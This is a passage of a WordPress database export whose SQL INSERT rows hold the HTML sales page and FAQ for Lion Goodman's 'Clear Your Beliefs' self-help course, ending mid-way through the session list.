gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, BeliefCloset.com, or ConfusedAboutLove.com.</p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 13:54:32', '2014-12-14 18:54:32', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2040, 2, '2014-12-14 13:50:43', '2014-12-14 18:50:43', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that 